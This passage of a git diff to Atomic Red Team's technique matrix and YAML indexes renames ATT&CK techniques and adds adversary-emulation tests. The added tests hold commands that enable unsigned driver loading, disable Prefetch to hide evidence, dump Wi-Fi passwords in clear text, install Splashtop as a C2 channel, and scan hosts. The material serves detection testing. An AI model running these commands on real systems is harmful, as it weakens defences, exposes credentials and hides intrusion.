 | Drive-by Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | System Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Server Software Component: Transport Agent](../../T1505.002/T1505.002.md) | [Event Triggered Execution: Application Shimming](../../T1546.011/T1546.011.md) | Mavinject [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Hybrid Identity [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Time Based Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Browser Session Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | DNS Calculation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Encrypted for Impact](../../T1486/T1486.md) |
@@ -57,7 +57,7 @@
 |  |  | KernelCallbackTable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Authentication Package](../../T1547.002/T1547.002.md) | Hybrid Identity [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  | Outlook Forms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: Component Object Model Hijacking](../../T1546.015/T1546.015.md) | Electron Applications [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  | Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: Path Interception by Unquoted Path](../../T1574.009/T1574.009.md) | [Rogue Domain Controller](../../T1207/T1207.md) |  |  |  |  |  |  |  |
-|  |  | Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Code Signing Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
+|  |  | Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Subvert Trust Controls: Code Signing Policy Modification](../../T1553.006/T1553.006.md) |  |  |  |  |  |  |  |
 |  |  | Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Network Logon Script [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Modify Registry](../../T1112/T1112.md) |  |  |  |  |  |  |  |
 |  |  | [IIS Components](../../T1505.004/T1505.004.md) | [Event Triggered Execution: AppInit DLLs](../../T1546.010/T1546.010.md) | [Hijack Execution Flow: Path Interception by Search Order Hijacking](../../T1574.008/T1574.008.md) |  |  |  |  |  |  |  |
 |  |  | [Event Triggered Execution](../../T1546/T1546.md) | [Event Triggered Execution: Screensaver](../../T1546.002/T1546.002.md) | Obfuscated Files or Information: Binary Padding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
@@ -5353,7 +5353,7 @@ defense-evasion:
        Driver Loader)"
      modified: '2022-05-24T14:00:00.188Z'
      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: Code Signing Policy Modification
+      name: 'Subvert Trust Controls: Code Signing Policy Modification'
      x_mitre_detection: 'Monitor processes and command-line arguments for actions
        that could be taken to modify the code signing policy of a system, such as
        <code>bcdedit.exe -set TESTSIGNING ON</code>.(Citation: Microsoft TESTSIGNING
@@ -5376,6 +5376,7 @@ defense-evasion:
      x_mitre_attack_spec_version: 2.1.0
      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
      spec_version: '2.1'
+      identifier: T1553.006
    atomic_tests: []
  T1610:
    technique:
@@ -50720,7 +50721,7 @@ discovery:
  T1016.002:
    technique:
      modified: '2023-10-05T11:35:30.887Z'
-      name: Wi-Fi Discovery
+      name: 'System Network Configuration Discovery: Wi-Fi Discovery'
      description: |
        Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems. Adversaries may use Wi-Fi information as part of [Account Discovery](https://attack.mitre.org/techniques/T1087), [Remote System Discovery](https://attack.mitre.org/techniques/T1018), and other discovery or [Credential Access](https://attack.mitre.org/tactics/TA0006) activity to support both ongoing and future campaigns.

@@ -50787,6 +50788,7 @@ discovery:
      x_mitre_attack_spec_version: 3.2.0
      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
      spec_version: '2.1'
+      identifier: T1016.002
    atomic_tests: []
  T1010:
    technique:
@@ -5257,7 +5257,7 @@ defense-evasion:
        Driver Loader)"
      modified: '2022-05-24T14:00:00.188Z'
      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: Code Signing Policy Modification
+      name: 'Subvert Trust Controls: Code Signing Policy Modification'
      x_mitre_detection: 'Monitor processes and command-line arguments for actions
        that could be taken to modify the code signing policy of a system, such as
        <code>bcdedit.exe -set TESTSIGNING ON</code>.(Citation: Microsoft TESTSIGNING
@@ -5280,6 +5280,7 @@ defense-evasion:
      x_mitre_attack_spec_version: 2.1.0
      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
      spec_version: '2.1'
+      identifier: T1553.006
    atomic_tests: []
  T1610:
    technique:
@@ -49824,7 +49825,7 @@ discovery:
  T1016.002:
    technique:
      modified: '2023-10-05T11:35:30.887Z'
-      name: Wi-Fi Discovery
+      name: 'System Network Configuration Discovery: Wi-Fi Discovery'
      description: |
        Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems. Adversaries may use Wi-Fi information as part of [Account Discovery](https://attack.mitre.org/techniques/T1087), [Remote System Discovery](https://attack.mitre.org/techniques/T1018), and other discovery or [Credential Access](https://attack.mitre.org/tactics/TA0006) activity to support both ongoing and future campaigns.

@@ -49891,6 +49892,7 @@ discovery:
      x_mitre_attack_spec_version: 3.2.0
      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
      spec_version: '2.1'
+      identifier: T1016.002
    atomic_tests: []
  T1010:
    technique:
@@ -5257,7 +5257,7 @@ defense-evasion:
        Driver Loader)"
      modified: '2022-05-24T14:00:00.188Z'
      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: Code Signing Policy Modification
+      name: 'Subvert Trust Controls: Code Signing Policy Modification'
      x_mitre_detection: 'Monitor processes and command-line arguments for actions
        that could be taken to modify the code signing policy of a system, such as
        <code>bcdedit.exe -set TESTSIGNING ON</code>.(Citation: Microsoft TESTSIGNING
@@ -5280,6 +5280,7 @@ defense-evasion:
      x_mitre_attack_spec_version: 2.1.0
      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
      spec_version: '2.1'
+      identifier: T1553.006
    atomic_tests: []
  T1610:
    technique:
@@ -49318,7 +49319,7 @@ discovery:
  T1016.002:
    technique:
      modified: '2023-10-05T11:35:30.887Z'
-      name: Wi-Fi Discovery
+      name: 'System Network Configuration Discovery: Wi-Fi Discovery'
      description: |
        Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems. Adversaries may use Wi-Fi information as part of [Account Discovery](https://attack.mitre.org/techniques/T1087), [Remote System Discovery](https://attack.mitre.org/techniques/T1018), and other discovery or [Credential Access](https://attack.mitre.org/tactics/TA0006) activity to support both ongoing and future campaigns.

@@ -49385,6 +49386,7 @@ discovery:
      x_mitre_attack_spec_version: 3.2.0
      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
      spec_version: '2.1'
+      identifier: T1016.002
    atomic_tests: []
  T1010:
    technique:
@@ -5257,7 +5257,7 @@ defense-evasion:
        Driver Loader)"
      modified: '2022-05-24T14:00:00.188Z'
      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: Code Signing Policy Modification
+      name: 'Subvert Trust Controls: Code Signing Policy Modification'
      x_mitre_detection: 'Monitor processes and command-line arguments for actions
        that could be taken to modify the code signing policy of a system, such as
        <code>bcdedit.exe -set TESTSIGNING ON</code>.(Citation: Microsoft TESTSIGNING
@@ -5280,6 +5280,7 @@ defense-evasion:
      x_mitre_attack_spec_version: 2.1.0
      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
      spec_version: '2.1'
+      identifier: T1553.006
    atomic_tests: []
  T1610:
    technique:
@@ -49144,7 +49145,7 @@ discovery:
  T1016.002:
    technique:
      modified: '2023-10-05T11:35:30.887Z'
-      name: Wi-Fi Discovery
+      name: 'System Network Configuration Discovery: Wi-Fi Discovery'
      description: |
        Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems. Adversaries may use Wi-Fi information as part of [Account Discovery](https://attack.mitre.org/techniques/T1087), [Remote System Discovery](https://attack.mitre.org/techniques/T1018), and other discovery or [Credential Access](https://attack.mitre.org/tactics/TA0006) activity to support both ongoing and future campaigns.

@@ -49211,6 +49212,7 @@ discovery:
      x_mitre_attack_spec_version: 3.2.0
      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
      spec_version: '2.1'
+      identifier: T1016.002
    atomic_tests: []
  T1010:
    technique:
@@ -5257,7 +5257,7 @@ defense-evasion:
        Driver Loader)"
      modified: '2022-05-24T14:00:00.188Z'
      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: Code Signing Policy Modification
+      name: 'Subvert Trust Controls: Code Signing Policy Modification'
      x_mitre_detection: 'Monitor processes and command-line arguments for actions
        that could be taken to modify the code signing policy of a system, such as
        <code>bcdedit.exe -set TESTSIGNING ON</code>.(Citation: Microsoft TESTSIGNING
@@ -5280,6 +5280,7 @@ defense-evasion:
      x_mitre_attack_spec_version: 2.1.0
      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
      spec_version: '2.1'
+      identifier: T1553.006
    atomic_tests: []
  T1610:
    technique:
@@ -49749,7 +49750,7 @@ discovery:
  T1016.002:
    technique:
      modified: '2023-10-05T11:35:30.887Z'
-      name: Wi-Fi Discovery
+      name: 'System Network Configuration Discovery: Wi-Fi Discovery'
      description: |
        Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems. Adversaries may use Wi-Fi information as part of [Account Discovery](https://attack.mitre.org/techniques/T1087), [Remote System Discovery](https://attack.mitre.org/techniques/T1018), and other discovery or [Credential Access](https://attack.mitre.org/tactics/TA0006) activity to support both ongoing and future campaigns.

@@ -49816,6 +49817,7 @@ discovery:
      x_mitre_attack_spec_version: 3.2.0
      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
      spec_version: '2.1'
+      identifier: T1016.002
    atomic_tests: []
  T1010:
    technique:
@@ -5257,7 +5257,7 @@ defense-evasion:
        Driver Loader)"
      modified: '2022-05-24T14:00:00.188Z'
      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: Code Signing Policy Modification
+      name: 'Subvert Trust Controls: Code Signing Policy Modification'
      x_mitre_detection: 'Monitor processes and command-line arguments for actions
        that could be taken to modify the code signing policy of a system, such as
        <code>bcdedit.exe -set TESTSIGNING ON</code>.(Citation: Microsoft TESTSIGNING
@@ -5280,6 +5280,7 @@ defense-evasion:
      x_mitre_attack_spec_version: 2.1.0
      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
      spec_version: '2.1'
+      identifier: T1553.006
    atomic_tests: []
  T1610:
    technique:
@@ -49959,7 +49960,7 @@ discovery:
  T1016.002:
    technique:
      modified: '2023-10-05T11:35:30.887Z'
-      name: Wi-Fi Discovery
+      name: 'System Network Configuration Discovery: Wi-Fi Discovery'
      description: |
        Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems. Adversaries may use Wi-Fi information as part of [Account Discovery](https://attack.mitre.org/techniques/T1087), [Remote System Discovery](https://attack.mitre.org/techniques/T1018), and other discovery or [Credential Access](https://attack.mitre.org/tactics/TA0006) activity to support both ongoing and future campaigns.

@@ -50026,6 +50027,7 @@ discovery:
      x_mitre_attack_spec_version: 3.2.0
      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
      spec_version: '2.1'
+      identifier: T1016.002
    atomic_tests: []
  T1010:
    technique:
@@ -5257,7 +5257,7 @@ defense-evasion:
        Driver Loader)"
      modified: '2022-05-24T14:00:00.188Z'
      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: Code Signing Policy Modification
+      name: 'Subvert Trust Controls: Code Signing Policy Modification'
      x_mitre_detection: 'Monitor processes and command-line arguments for actions
        that could be taken to modify the code signing policy of a system, such as
        <code>bcdedit.exe -set TESTSIGNING ON</code>.(Citation: Microsoft TESTSIGNING
@@ -5280,6 +5280,7 @@ defense-evasion:
      x_mitre_attack_spec_version: 2.1.0
      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
      spec_version: '2.1'
+      identifier: T1553.006
    atomic_tests: []
  T1610:
    technique:
@@ -49684,7 +49685,7 @@ discovery:
  T1016.002:
    technique:
      modified: '2023-10-05T11:35:30.887Z'
-      name: Wi-Fi Discovery
+      name: 'System Network Configuration Discovery: Wi-Fi Discovery'
      description: |
        Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems. Adversaries may use Wi-Fi information as part of [Account Discovery](https://attack.mitre.org/techniques/T1087), [Remote System Discovery](https://attack.mitre.org/techniques/T1018), and other discovery or [Credential Access](https://attack.mitre.org/tactics/TA0006) activity to support both ongoing and future campaigns.

@@ -49751,6 +49752,7 @@ discovery:
      x_mitre_attack_spec_version: 3.2.0
      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
      spec_version: '2.1'
+      identifier: T1016.002
    atomic_tests: []
  T1010:
    technique:
@@ -12288,7 +12288,7 @@ defense-evasion:
        Driver Loader)"
      modified: '2022-05-24T14:00:00.188Z'
      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: Code Signing Policy Modification
+      name: 'Subvert Trust Controls: Code Signing Policy Modification'
      x_mitre_detection: 'Monitor processes and command-line arguments for actions
        that could be taken to modify the code signing policy of a system, such as
        <code>bcdedit.exe -set TESTSIGNING ON</code>.(Citation: Microsoft TESTSIGNING
@@ -12311,7 +12311,19 @@ defense-evasion:
      x_mitre_attack_spec_version: 2.1.0
      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
      spec_version: '2.1'
-    atomic_tests: []
+      identifier: T1553.006
+    atomic_tests:
+    - name: Code Signing Policy Modification
+      auto_generated_guid: bb6b51e1-ab92-45b5-aeea-e410d06405f8
+      description: Allows adversaries to subvert trust controls by modifying the code
+        signing policy, enabling the execution of unsigned drivers.
+      supported_platforms:
+      - windows
+      executor:
+        command: bcdedit /set testsigning on
+        cleanup_command: bcdedit /set testsigning off
+        name: command_prompt
+        elevation_required: true
  T1610:
    technique:
      modified: '2024-04-11T21:24:42.680Z'
@@ -13853,6 +13865,26 @@ defense-evasion:
          /f >nul 2>&1)'
        name: command_prompt
        elevation_required: true
+    - name: Disable Windows Prefetch Through Registry
+      auto_generated_guid: 7979dd41-2045-48b2-a54e-b1bc2415c9da
+      description: 'Modify the registry of the machine to disable prefetch. Disabling
+        prefetch will remove one artifact for evidence of application execution. Restart
+        is required post modification
+
+        '
+      supported_platforms:
+      - windows
+      executor:
+        command: 'reg add "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Memory
+          Management\PrefetchParameters" /v "EnablePrefetcher" /t REG_DWORD /d 0 /f
+
+          '
+        cleanup_command: 'reg add "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Memory
+          Management\PrefetchParameters" /v "EnablePrefetcher" /t REG_DWORD /d 3 /f
+
+          '
+        name: command_prompt
+        elevation_required: true
  T1574.008:
    technique:
      modified: '2023-05-09T14:00:00.188Z'
@@ -73575,6 +73607,10 @@ command-and-control:
          description: Path of MSP360 executable
          type: path
          default: "$env:ProgramFiles\\Connect\\Connect.exe"
+        MSP360_Download_Url:
+          description: URL to download MSP360 Connect from
+          type: url
+          default: 
      dependency_executor_name: powershell
      dependencies:
      - description: 'MSP360 must exist at (#{MSP360_Connect_Path})
@@ -73586,8 +73622,8 @@ command-and-control:
          '
        get_prereq_command: "New-Item -Type Directory \"PathToAtomicsFolder\\..\\ExternalPayloads\\\"
          -ErrorAction Ignore -Force | Out-Null\nInvoke-WebRequest -OutFile \"PathToAtomicsFolder\\..\\ExternalPayloads\\msp360connect.exe\"
-          \"https://s3.amazonaws.com/cb_setups/_current/cbra/setup.exe?X-Amz-Expires=604800&X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIA2WIZE3YN7NOSY65U/20230515/us-east-1/s3/aws4_request&X-Amz-Date=20230515T024742Z&X-Amz-SignedHeaders=host&response-content-disposition=attachment;filename=ConnectStandaloneSetup_v3.3.0.15_netv4.5.1_cFA9100C6.exe&X-Amz-Signature=1fe3ddf93f8431b182fac90341f80a4ebf8665ddcc0e36dd385ee20d0ce865c9\"\nstart-process
-          \"PathToAtomicsFolder\\..\\ExternalPayloads\\msp360connect.exe\" /S    \n"
+          \"#{MSP360_Download_Url}\"\nstart-process \"PathToAtomicsFolder\\..\\ExternalPayloads\\msp360connect.exe\"
+          /S    \n"
      executor:
        command: 'Start-Process #{MSP360_Connect_Path}

@@ -73613,6 +73649,41 @@ command-and-control:
          $file = Join-Path $env:USERPROFILE "Desktop\rustdesk-1.2.3-1-x86_64.exe"
          Remove-Item $file1 -ErrorAction Ignore
        name: powershell
+    - name: Splashtop Execution
+      auto_generated_guid: b025c580-029e-4023-888d-a42710d76934
+      description: |
+        An adversary may attempt to trick the user into downloading Splashtop for use as a C2 channel.
+        Upon successful execution, Splashtop will be executed.
+      supported_platforms:
+      - windows
+      input_arguments:
+        Splashtop_Path:
+          description: Path of Splashtop executable
+          type: path
+          default: "${env:programfiles(x86)}\\Splashtop\\Splashtop Remote\\Client
+            for STP\\strwinclt.exe"
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'Splashtop must exist at "#{Splashtop_Path}"
+
+          '
+        prereq_command: 'if (Test-Path "#{Splashtop_Path}") {exit 0} else {exit 1}
+
+          '
+        get_prereq_command: "New-Item -Type Directory \"PathToAtomicsFolder\\..\\ExternalPayloads\\\"
+          -ErrorAction Ignore -Force | Out-Null\nInvoke-WebRequest -OutFile \"PathToAtomicsFolder\\..\\ExternalPayloads\\splashtop_install.exe\"
+          \"https://download.splashtop.com/winclient/STP/Splashtop_Personal_Win_v3.6.6.0.exe\"\nstart-sleep
+          30\nstart-process \"PathToAtomicsFolder\\..\\ExternalPayloads\\splashtop_install.exe\"
+          /S  \nstart-sleep 30      \n"
+      executor:
+        command: 'Start-Process "#{Splashtop_Path}"
+
+          '
+        cleanup_command: 'Stop-Process -Name "strwinclt" -force -erroraction silentlycontinue
+
+          '
+        name: powershell
+        elevation_required: true
  T1659:
    technique:
      modified: '2023-10-01T02:28:45.147Z'
@@ -99645,7 +99716,7 @@ discovery:
  T1016.002:
    technique:
      modified: '2023-10-05T11:35:30.887Z'
-      name: Wi-Fi Discovery
+      name: 'System Network Configuration Discovery: Wi-Fi Discovery'
      description: |
        Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems. Adversaries may use Wi-Fi information as part of [Account Discovery](https://attack.mitre.org/techniques/T1087), [Remote System Discovery](https://attack.mitre.org/techniques/T1018), and other discovery or [Credential Access](https://attack.mitre.org/tactics/TA0006) activity to support both ongoing and future campaigns.

@@ -99712,7 +99783,19 @@ discovery:
      x_mitre_attack_spec_version: 3.2.0
      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
      spec_version: '2.1'
-    atomic_tests: []
+      identifier: T1016.002
+    atomic_tests:
+    - name: Enumerate Stored Wi-Fi Profiles And Passwords via netsh
+      auto_generated_guid: 53cf1903-0fa7-4177-ab14-f358ae809eec
+      description: Upon successful execution, information about previously connected
+        Wi-Fi networks will be displayed with their corresponding key (if present).
+      supported_platforms:
+      - windows
+      executor:
+        command: netsh wlan show profile * key=clear
+        cleanup_command: 
+        name: command_prompt
+        elevation_required: false
  T1010:
    technique:
      modified: '2023-10-31T14:00:00.188Z'
@@ -103754,6 +103837,40 @@ discovery:

          '
        name: command_prompt
+    - name: Enumerate Remote Hosts with Netscan
+      auto_generated_guid: b8147c9a-84db-4ec1-8eee-4e0da75f0de5
+      description: This test uses Netscan to identify remote hosts in a specified
+        network range.
+      supported_platforms:
+      - windows
+      input_arguments:
+        netscan_path:
+          description: NetScan exe location
+          type: path
+          default: PathToAtomicsFolder\..\ExternalPayloads\netscan\64-bit\netscan.exe
+        range_to_scan:
+          description: The IP range to scan with Netscan
+          type: string
+          default: 127.0.0.1-127.0.0.1
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'Netscan must be installed
+
+          '
+        prereq_command: if (Test-Path "#{netscan_path}") {exit 0} else {exit 1}
+        get_prereq_command: |
+          New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
+          Invoke-WebRequest -OutFile "PathToAtomicsFolder\..\ExternalPayloads\netscan.zip" "https://www.softperfect.com/download/files/netscan_portable.zip"
+          Expand-Archive -LiteralPath "PathToAtomicsFolder\..\ExternalPayloads\netscan.zip" -DestinationPath "PathToAtomicsFolder\..\ExternalPayloads\netscan"
+      executor:
+        command: cmd /c '#{netscan_path}' /hide /auto:"$env:temp\T1018NetscanOutput.txt"
+          /range:'#{range_to_scan}'
+        cleanup_command: 'remove-item "$env:temp\T1018NetscanOutput.txt" -force -erroraction
+          silentlycontinue
+
+          '
+        name: powershell
+        elevation_required: false
  T1046:
    technique:
      modified: '2023-08-11T21:10:09.547Z'
@@ -7369,7 +7369,7 @@ defense-evasion:
        Driver Loader)"
      modified: '2022-05-24T14:00:00.188Z'
      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: Code Signing Policy Modification
+      name: 'Subvert Trust Controls: Code Signing Policy Modification'
      x_mitre_detection: 'Monitor processes and command-line arguments for actions
        that could be taken to modify the code signing policy of a system, such as
        <code>bcdedit.exe -set TESTSIGNING ON</code>.(Citation: Microsoft TESTSIGNING
@@ -7392,6 +7392,7 @@ defense-evasion:
      x_mitre_attack_spec_version: 2.1.0
      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
      spec_version: '2.1'
+      identifier: T1553.006
    atomic_tests: []
  T1610:
    technique:
@@ -60167,7 +60168,7 @@ discovery:
  T1016.002:
    technique:
      modified: '2023-10-05T11:35:30.887Z'
-      name: Wi-Fi Discovery
+      name: 'System Network Configuration Discovery: Wi-Fi Discovery'
      description: |
        Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems. Adversaries may use Wi-Fi information as part of [Account Discovery](https://attack.mitre.org/techniques/T1087), [Remote System Discovery](https://attack.mitre.org/techniques/T1018), and other discovery or [Credential Access](https://attack.mitre.org/tactics/TA0006) activity to support both ongoing and future campaigns.

@@ -60234,6 +60235,7 @@ discovery:
      x_mitre_attack_spec_version: 3.2.0
      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
      spec_version: '2.1'
+      identifier: T1016.002
    atomic_tests: []
  T1010:
    technique:
@@ -6496,7 +6496,7 @@ defense-evasion:
        Driver Loader)"
      modified: '2022-05-24T14:00:00.188Z'
      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: Code Signing Policy Modification
+      name: 'Subvert Trust Controls: Code Signing Policy Modification'
      x_mitre_detection: 'Monitor processes and command-line arguments for actions
        that could be taken to modify the code signing policy of a system, such as
        <code>bcdedit.exe -set TESTSIGNING ON</code>.(Citation: Microsoft TESTSIGNING
@@ -6519,6 +6519,7 @@ defense-evasion:
      x_mitre_attack_spec_version: 2.1.0
      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
      spec_version: '2.1'
+      identifier: T1553.006
    atomic_tests: []
  T1610:
    technique:
@@ -54743,7 +54744,7 @@ discovery:
  T1016.002:
    technique:
      modified: '2023-10-05T11:35:30.887Z'
-      name: Wi-Fi Discovery
+      name: 'System Network Configuration Discovery: Wi-Fi Discovery'
      description: |
        Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems. Adversaries may use Wi-Fi information as part of [Account Discovery](https://attack.mitre.org/techniques/T1087), [Remote System Discovery](https://attack.mitre.org/techniques/T1018), and other discovery or [Credential Access](https://attack.mitre.org/tactics/TA0006) activity to support both ongoing and future campaigns.

@@ -54810,6 +54811,7 @@ discovery:
      x_mitre_attack_spec_version: 3.2.0
      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
      spec_version: '2.1'
+      identifier: T1016.002
    atomic_tests: []
  T1010:
    technique:
@@ -5257,7 +5257,7 @@ defense-evasion:
        Driver Loader)"
      modified: '2022-05-24T14:00:00.188Z'
      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: Code Signing Policy Modification
+      name: 'Subvert Trust Controls: Code Signing Policy Modification'
      x_mitre_detection: 'Monitor processes and command-line arguments for actions
        that could be taken to modify the code signing policy of a system, such as
        <code>bcdedit.exe -set TESTSIGNING ON</code>.(Citation: Microsoft TESTSIGNING
@@ -5280,6 +5280,7 @@ defense-evasion:
      x_mitre_attack_spec_version: 2.1.0
      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
      spec_version: '2.1'
+      identifier: T1553.006
    atomic_tests: []
  T1610:
    technique:
@@ -49514,7 +49515,7 @@ discovery:
  T1016.002:
    technique:
      modified: '2023-10-05T11:35:30.887Z'
-      name: Wi-Fi Discovery
+      name: 'System Network Configuration Discovery: Wi-Fi Discovery'
      description: |
        Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems. Adversaries may use Wi-Fi information as part of [Account Discovery](https://attack.mitre.org/techniques/T1087), [Remote System Discovery](https://attack.mitre.org/techniques/T1018), and other discovery or [Credential Access](https://attack.mitre.org/tactics/TA0006) activity to support both ongoing and future campaigns.

@@ -49581,6 +49582,7 @@ discovery:
      x_mitre_attack_spec_version: 3.2.0
      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
      spec_version: '2.1'
+      identifier: T1016.002
    atomic_tests: []
  T1010:
    technique:
@@ -5257,7 +5257,7 @@ defense-evasion:
        Driver Loader)"
      modified: '2022-05-24T14:00:00.188Z'
      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: Code Signing Policy Modification
+      name: 'Subvert Trust Controls: Code Signing Policy Modification'
      x_mitre_detection: 'Monitor processes and command-line arguments for actions
        that could be taken to modify the code signing policy of a system, such as
        <code>bcdedit.exe -set TESTSIGNING ON</code>.(Citation: Microsoft TESTSIGNING
@@ -5280,6 +5280,7 @@ defense-evasion:
      x_mitre_attack_spec_version: 2.1.0
      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
      spec_version: '2.1'
+      identifier: T1553.006
    atomic_tests: []
  T1610:
    technique:
@@ -49144,7 +49145,7 @@ discovery:
  T1016.002:
    technique:
      modified: '2023-10-05T11:35:30.887Z'
-      name: Wi-Fi Discovery
+      name: 'System Network Configuration Discovery: Wi-Fi Discovery'
      description: |
        Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems. Adversaries may use Wi-Fi information as part of [Account Discovery](https://attack.mitre.org/techniques/T1087), [Remote System Discovery](https://attack.mitre.org/techniques/T1018), and other discovery or [Credential Access](https://attack.mitre.org/tactics/TA0006) activity to support both ongoing and future campaigns.

@@ -49211,6 +49212,7 @@ discovery:
      x_mitre_attack_spec_version: 3.2.0
      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
      spec_version: '2.1'
+      identifier: T1016.002
    atomic_tests: []
  T1010:
    technique:
@@ -9668,7 +9668,7 @@ defense-evasion:
        Driver Loader)"
      modified: '2022-05-24T14:00:00.188Z'
      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: Code Signing Policy Modification
+      name: 'Subvert Trust Controls: Code Signing Policy Modification'
      x_mitre_detection: 'Monitor processes and command-line arguments for actions
        that could be taken to modify the code signing policy of a system, such as
        <code>bcdedit.exe -set TESTSIGNING ON</code>.(Citation: Microsoft TESTSIGNING
@@ -9691,7 +9691,19 @@ defense-evasion:
      x_mitre_attack_spec_version: 2.1.0
      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
      spec_version: '2.1'
-    atomic_tests: []
+      identifier: T1553.006
+    atomic_tests:
+    - name: Code Signing Policy Modification
+      auto_generated_guid: bb6b51e1-ab92-45b5-aeea-e410d06405f8
+      description: Allows adversaries to subvert trust controls by modifying the code
